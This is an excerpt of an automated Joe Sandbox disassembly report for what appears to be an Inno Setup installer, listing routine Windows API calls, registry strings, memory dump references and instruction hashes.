                                                                                                                                        • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                                                                                                        APIs
                                                                                                                                        • IsWindowVisible.USER32(?), ref: 0041EE64
                                                                                                                                        • IsWindowEnabled.USER32(?), ref: 0041EE6E
                                                                                                                                        • EnableWindow.USER32(?,00000000), ref: 0041EE94
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$EnableEnabledVisible
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3234591441-0
                                                                                                                                        • Opcode ID: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                                                                        • Instruction ID: 3b4cb379701a2ac24b7d0c87bf9454d2e26b3d0fb89a85d5a5a22e513a73856b
                                                                                                                                        • Opcode Fuzzy Hash: 495d6a49dc4b54b7e424eeae3cce025a94256eba33976185de8149e812397146
                                                                                                                                        • Instruction Fuzzy Hash: EAE06DB5100301AAE301AB2BDC81B5B7A9CAB54350F05843BA9089B292D63ADC408B7C
                                                                                                                                        APIs
                                                                                                                                        • SetActiveWindow.USER32(?), ref: 0046A02D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ActiveWindow
                                                                                                                                        • String ID: PrepareToInstall
                                                                                                                                        • API String ID: 2558294473-1101760603
                                                                                                                                        • Opcode ID: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                                                                        • Instruction ID: c614f106b7f0b4f176116dff63491c2ec041d81708a05a15fd0d1780f22877a3
                                                                                                                                        • Opcode Fuzzy Hash: bd917288eaa5b05b1195b505efe9116c2b5c78d32a5283306b423edfa0bdd6d5
                                                                                                                                        • Instruction Fuzzy Hash: 97A14934A00109DFCB00EF99D986EDEB7F5AF48304F5540B6E404AB362D738AE45CB9A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: /:*?"<>|
                                                                                                                                        • API String ID: 0-4078764451
                                                                                                                                        • Opcode ID: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                                                                        • Instruction ID: 6c3526c54916fe71946563460b5bd12015a165326d65a32731909bc5939f884d
                                                                                                                                        • Opcode Fuzzy Hash: e5c60157bcf2278da473a52dbfa3e40327efacf8e8b2ac4b78b74c9d89147c88
                                                                                                                                        • Instruction Fuzzy Hash: CF71C370A40215BADB10E766DCD2FEE7BA19F05308F148067F580BB292E779AD458B4E
                                                                                                                                        APIs
                                                                                                                                        • SetActiveWindow.USER32(?), ref: 00482676
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ActiveWindow
                                                                                                                                        • String ID: InitializeWizard
                                                                                                                                        • API String ID: 2558294473-2356795471
                                                                                                                                        • Opcode ID: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                                                                        • Instruction ID: 0fabbc08dbff6a0894d12042e1c617afa12541eacf44f0b659f2bb150b55c2ae
                                                                                                                                        • Opcode Fuzzy Hash: 3626624f3147e861467950174f06d96ecabfee41a1c9b8d7b2440425271d24be
                                                                                                                                        • Instruction Fuzzy Hash: 8311C130204200AFD700EB69EED6B1A37E4E764328F60057BE404D72A1EA796C41CB5E
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000001,00000000,?,?,?,?,?,0047C740,00000000,0047C942), ref: 0047C539
                                                                                                                                        Strings
                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion, xrefs: 0047C509
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpen
                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion
                                                                                                                                        • API String ID: 47109696-1019749484
                                                                                                                                        • Opcode ID: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                                                                                                        • Instruction ID: acdf9366f140fa0c09696ff4b806567a5b27613a006b44f2785fa8682630d216
                                                                                                                                        • Opcode Fuzzy Hash: 058bbab7ea9ec86a0dd33160b35f36364f977485e0abef3b7f9f2bc760079b92
                                                                                                                                        • Instruction Fuzzy Hash: 6CF0823170052477DA00A65E6C82B9FA79D8B84758F60403FF508DB242EABAEE0243EC
                                                                                                                                        APIs
                                                                                                                                        • RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,0047620E,?,0049C1E0,?,0046F15B,?,00000000,0046F6F6,?,_is1), ref: 0046EE67
                                                                                                                                        Strings
                                                                                                                                        • Inno Setup: Setup Version, xrefs: 0046EE65
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Value
                                                                                                                                        • String ID: Inno Setup: Setup Version
                                                                                                                                        • API String ID: 3702945584-4166306022
                                                                                                                                        • Opcode ID: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                                                                                                        • Instruction ID: 37dbbd71146fd60ed96ba35b84ff74d599aeccd68d0f9eb37ee109455dfe34ad
                                                                                                                                        • Opcode Fuzzy Hash: 80676ca53bf8d59feef104d4bc7cb567c816a54b460bafb4a4ed583678a3f251
                                                                                                                                        • Instruction Fuzzy Hash: B1E06D753012043FE710AA2B9C85F5BBADCDF88365F10403AB908DB392D578DD0181A9
                                                                                                                                        APIs
                                                                                                                                        • RegSetValueExA.ADVAPI32(?,NoModify,00000000,00000004,00000000,00000004,00000001,?,0046F532,?,?,00000000,0046F6F6,?,_is1,?), ref: 0046EEC7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Value
                                                                                                                                        • String ID: NoModify
                                                                                                                                        • API String ID: 3702945584-1699962838
                                                                                                                                        • Opcode ID: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                                                                        • Instruction ID: 84621f748531697c6bb4a8e0450a59e651a2caf9945441e4ffcb8bd5fa838dfd
                                                                                                                                        • Opcode Fuzzy Hash: f40bfeae81701b53243146576d0ffb0e6a468f93b3df03c8cd4f9f1e738a44cb
                                                                                                                                        • Instruction Fuzzy Hash: F6E04FB4640308BFEB04DB55CD4AF6B77ECDB48714F10405ABA049B281E674FE00C669
                                                                                                                                        APIs
                                                                                                                                        • GetACP.KERNEL32(?,?,00000001,00000000,0047E753,?,-0000001A,00480609,-00000010,?,00000004,0000001B,00000000,00480956,?,0045DB68), ref: 0047E4EA
                                                                                                                                          • Part of subcall function 0042E31C: GetDC.USER32(00000000), ref: 0042E32B
                                                                                                                                          • Part of subcall function 0042E31C: EnumFontsA.GDI32(?,00000000,0042E308,00000000,00000000,0042E374,?,00000000,00000000,004809BD,?,?,00000001,00000000,00000002,00000000), ref: 0042E356
                                                                                                                                          • Part of subcall function 0042E31C: ReleaseDC.USER32(00000000,?), ref: 0042E36E
                                                                                                                                        • SendNotifyMessageA.USER32(00010438,00000496,00002711,-00000001), ref: 0047E6BA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EnumFontsMessageNotifyReleaseSend
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2649214853-0
                                                                                                                                        • Opcode ID: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                                                                        • Instruction ID: a62c935d52da393e7312112ce75ddb0898731394ffd2a16b1d4fc3e518f8127d
                                                                                                                                        • Opcode Fuzzy Hash: 7f479caed6d506e1fedd37a3e9b8fbc918d7d672324c4412b746d2e8a14c4527
                                                                                                                                        • Instruction Fuzzy Hash: 5B5195746001049BC710FF67E98169A37E5EB58308B90C67BA8049B3A6DB3CED45CB9D
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0047DF83,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DF3D
                                                                                                                                          • Part of subcall function 0042CA00: GetSystemMetrics.USER32(0000002A), ref: 0042CA12
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMetricsMultiSystemWide
                                                                                                                                        • String ID: /G
                                                                                                                                        • API String ID: 224039744-2088674125
                                                                                                                                        • Opcode ID: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                                                                        • Instruction ID: 84c81a41a939c89cd5cf89585cf0d961f9543ff151f38a86aad590f5673b43e0
                                                                                                                                        • Opcode Fuzzy Hash: 9f8ad520ff63b3f089cafa147e7d8bbd1691bb3a433f158030b0d1014876a4d7
                                                                                                                                        • Instruction Fuzzy Hash: 53518070A04215AFDB21DF55D8C4FAA7BB8EF64318F118077E404AB3A1C778AE45CB99
                                                                                                                                        APIs
                                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DF6C
                                                                                                                                        • RegCloseKey.ADVAPI32(?,0042DFDD,?,00000000,00000000,00000000,00000000,00000000,0042DFD6,?,?,00000008,00000000,00000000,0042E003), ref: 0042DFD0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseEnum
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2818636725-0
                                                                                                                                        • Opcode ID: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                                                                        • Instruction ID: d62689c7b7995b9893119ef97773413105dd68debc8ff02f2d4f9d8a28cc91ff
                                                                                                                                        • Opcode Fuzzy Hash: 54e2847b2ed8cbec0c232d6556bf46b22f1e93997a90c035dd6b8310f6c19c74
                                                                                                                                        • Instruction Fuzzy Hash: DD31B270F04258AEDB11DFA6DD42BAEBBB9EB49304F91407BE501E6280D6785E01CA2D
                                                                                                                                        APIs
                                                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 0045283C
                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,?,?,00458278,00000000,00458260,?,?,?,00000000,00452862,?,?,?,00000001), ref: 00452844
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateErrorLastProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2919029540-0
                                                                                                                                        • Opcode ID: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                                                                        • Instruction ID: fcc055d8c1a696a2a0db1e32a085008d871673fec5534948229a16d4440eefa6
                                                                                                                                        • Opcode Fuzzy Hash: 32d7980bd8ec2bee900e92c865b72ef71cfaa45d55aa0c85c0401d49ed696f28
                                                                                                                                        • Instruction Fuzzy Hash: A2113C72600208AF8B40DEA9DD41D9F77ECEB4E310B114567FD18D3241D678EE148B68
                                                                                                                                        APIs
                                                                                                                                        • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040ADF2
                                                                                                                                        • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040AF4F,00000000,0040AF67,?,?,?,00000000), ref: 0040AE03
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Resource$FindFree
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4097029671-0
                                                                                                                                        • Opcode ID: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                                                                        • Instruction ID: 3d7a77417cef7b3885e8747e4544195f2de945da78ee84bb1155330bb8f828e3
                                                                                                                                        • Opcode Fuzzy Hash: 07387713778517d694c210176a4718dd0562bb365b6db4bb8115bda04798bcb6
                                                                                                                                        • Instruction Fuzzy Hash: 0301F771300700AFD700FF69EC52E1B77EDDB46714710807AF500AB3D1D639AC10966A
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 0041EEF3
                                                                                                                                        • EnumThreadWindows.USER32(00000000,0041EE54,00000000), ref: 0041EEF9
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Thread$CurrentEnumWindows
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2396873506-0
                                                                                                                                        • Opcode ID: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                                                                        • Instruction ID: bcaa23655132f8f2785c0a842f21b48ac99b37e3223c43442b01e3940dbd0cdf
                                                                                                                                        • Opcode Fuzzy Hash: 30aad164e0a195eeb96462141dc827bf49acbc8680001675c00c89b7ac155170
                                                                                                                                        • Instruction Fuzzy Hash: 31015B76A04604BFD706CF6BEC1199ABBE8E789720B22887BEC04D3690E7355C10DF18
                                                                                                                                        APIs
                                                                                                                                        • MoveFileA.KERNEL32(00000000,00000000), ref: 00452CC2
                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,00452CE8), ref: 00452CCA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFileLastMove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 55378915-0
                                                                                                                                        • Opcode ID: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                                                                        • Instruction ID: 1f9035ddd188b097fe3d15476f32cd7793c58c8f4df07880d9fc6ba60e4ff235
                                                                                                                                        • Opcode Fuzzy Hash: 92f277caa9c3c56662d1ce6f28aaa0531c95695199337b3952b9b7b9e7465d28
                                                                                                                                        • Instruction Fuzzy Hash: 9401D671A04208AB8712EB799D4149EB7ECEB8A32575045BBFC04E3243EA785E048558
                                                                                                                                        APIs
                                                                                                                                        • VirtualFree.KERNEL32(?,?,00004000,?,?,?,?,?,00401973), ref: 00401766
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                        • String ID: uu
                                                                                                                                        • API String ID: 1263568516-2249551878
                                                                                                                                        • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                                                                        • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                                                                                                        • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                                                                        • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                                                                                        APIs
                                                                                                                                        • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527A9
                                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,004527CF), ref: 004527B1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDirectoryErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1375471231-0
                                                                                                                                        • Opcode ID: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
                                                                                                                                        • Instruction ID: e3b373b60118a844676bb749001e6832c3b26a50706decb61b3ae2e0e224b701
                                                                                                                                        • Opcode Fuzzy Hash: 855e2e178366579e8cdbc9f044a0346376c594dce53ca60ac40061c8de66a150
